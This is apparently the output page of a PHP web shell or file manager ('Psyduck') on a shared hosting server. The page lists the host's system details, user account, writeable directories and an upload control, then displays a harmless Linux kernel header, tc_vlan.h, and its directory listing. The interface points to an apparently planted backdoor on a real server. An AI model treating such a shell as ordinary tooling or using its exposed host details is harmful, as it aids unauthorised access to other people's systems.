Psyduck - 可達鴨 之 鴨力山大2


Server : LiteSpeed
System : Linux premium217.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User : alloknri ( 880)
PHP Version : 8.1.34
Disable Function : NONE
Directory :  /usr/include/linux/tc_act/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/include/linux/tc_act/tc_vlan.h
/* SPDX-License-Identifier: GPL-2.0+ WITH Linux-syscall-note */
/*
 * Copyright (c) 2014 Jiri Pirko <jiri@resnulli.us>
 */

#ifndef __LINUX_TC_VLAN_H
#define __LINUX_TC_VLAN_H

#include <linux/pkt_cls.h>

#define TCA_VLAN_ACT_POP	1
#define TCA_VLAN_ACT_PUSH	2
#define TCA_VLAN_ACT_MODIFY	3
#define TCA_VLAN_ACT_POP_ETH	4
#define TCA_VLAN_ACT_PUSH_ETH	5

struct tc_vlan {
	tc_gen;
	int v_action;
};

enum {
	TCA_VLAN_UNSPEC,
	TCA_VLAN_TM,
	TCA_VLAN_PARMS,
	TCA_VLAN_PUSH_VLAN_ID,
	TCA_VLAN_PUSH_VLAN_PROTOCOL,
	TCA_VLAN_PAD,
	TCA_VLAN_PUSH_VLAN_PRIORITY,
	TCA_VLAN_PUSH_ETH_DST,
	TCA_VLAN_PUSH_ETH_SRC,
	__TCA_VLAN_MAX,
};
#define TCA_VLAN_MAX (__TCA_VLAN_MAX - 1)

#endif
Name
Size
Permissions
Options
tc_bpf.h
0.497 KB
-rw-r--r--
tc_connmark.h
0.381 KB
-rw-r--r--
tc_csum.h
0.629 KB
-rw-r--r--
tc_ct.h
0.912 KB
-rw-r--r--
tc_ctinfo.h
0.543 KB
-rw-r--r--
tc_defact.h
0.314 KB
-rw-r--r--
tc_gact.h
0.611 KB
-rw-r--r--
tc_gate.h
0.85 KB
-rw-r--r--
tc_ife.h
0.586 KB
-rw-r--r--
tc_ipt.h
0.405 KB
-rw-r--r--
tc_mirred.h
0.711 KB
-rw-r--r--
tc_mpls.h
1 KB
-rw-r--r--
tc_nat.h
0.414 KB
-rw-r--r--
tc_pedit.h
1.491 KB
-rw-r--r--
tc_sample.h
0.445 KB
-rw-r--r--
tc_skbedit.h
0.828 KB
-rw-r--r--
tc_skbmod.h
0.573 KB
-rw-r--r--
tc_tunnel_key.h
2.42 KB
-rw-r--r--
tc_vlan.h
0.656 KB
-rw-r--r--